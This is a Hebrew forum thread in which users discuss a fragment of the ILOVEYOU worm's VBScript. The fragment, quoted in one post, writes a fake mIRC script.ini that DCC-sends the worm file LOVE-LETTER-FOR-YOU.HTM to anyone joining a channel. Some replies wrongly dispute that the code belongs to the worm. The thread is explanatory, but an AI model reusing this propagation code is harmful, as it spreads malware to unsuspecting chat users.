I Love You

Magik7

New member
I Love You

שעיינתי בסקריפט של הוירוס המפורסם I Love You, גיליתי שורה מעניינת על Mirc, אך מכיוון שאני לא יודע Visual Basic, לא הבנתי בדיוק במה מדובר. מה עושה הוירוס ל Mirc ?
 

Choopie

New member
תשמע

יותר מדי אני רואה היית במירק והכל נראה לך מירקי זה לא קשור בכלל תצא מזה
 

Magik7

New member
למעשה...

אני לי מושג ב Mirc. אני לא משתמש בזה בכלל. רק רציתי לדעת מה פשר הסקריפט הבא: if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close (לקוח מאת iloveyou.txt.vbs)
 

Choopie

New member
לא לא נראה לי שזה מהוירוס

נראה כמו סתם סקריפט רגיל ולא מסובך
 

Magik7

New member
זה לא הוירוס

זה רק חלק קטנטן ממנו. אני לא יכול להוסיף את הסקריפט המלא בגלל שהוא מעל 7000 תווים.
 

Choopie

New member
בכל מקרה

רק בשביל הידע הכללי שלך זה לא הוירוס
 

Choopie

New member
אההה

יכול להיות גם שזה של מישהו שרצה להפיץ את הוירוס במירק אז הוא כתב לעצמו בסקריפט שכל מי שיכנס למירק אוטומטית זה ישלח לו את הוירוס דווקא חמוד מה שהוא עשה אבל בטח שאל תחשוב שזה תוכן הוירוס זה תוכן סקריפט המירק של מישהו שרצה לשלוח את הוירוס לכל אחד שנכנס למירק
 

Magik7

New member
יכול להיות גם...

שזה שכתב את הוירוס רצה שהוא יופץ גם במירק.
 

Choopie

New member
לא לא לא

בטוח שלא מי שכתב רצה להפיץ אותו במירק כי מי שכתב אותו מספיק חכם בשביל להפיץ אותו בדרכים אחרות כי גם כל הסרברים במירק חוסמים קבצים מהסוג הזה אז לא יודע מה הוא רצה זה היה בטח סתם אפס שניסה להרוס לאנשים את המחשבים אבל בטוח שזה לא הכותב של הוירוס
 

עוזי 2

New member
הבנתי

סתם, בדקתי מה יש ל- Mcafee להגיד בנושא: http://vil.nai.com/vil/virusSummary.asp?virus_k=98617 אז גם הם לא מסכימים איתך. כנראה שזה מכניס גם אותם לקטגוריה של "אפסים"
 

Choopie

New member
מה אכפת לי מה הם ומי הם

אני מדבר איתך על עובדות
 

S-G-T

New member
!!!

נכון ! - באמת ! מי אלה ה"אפסים" הממרים את פי ה סוכריה אל המקל שלנו ?! - מה הם חושבים לעצמם ?! - גם כן מיקצוענים - הchoopie שלנו will root them with netstat only ! הוא הרי סופר האקר - מה לא ידעת ?
 

eyalk5

New member
גם לי משהוא לא נראה בסדר

לדוגמה מאיפה s שווה משהוא
 

mmm

New member
משהו שישים קץ לוויכוח....קראו.....!

הסבר על הוירוס...
 
למעלה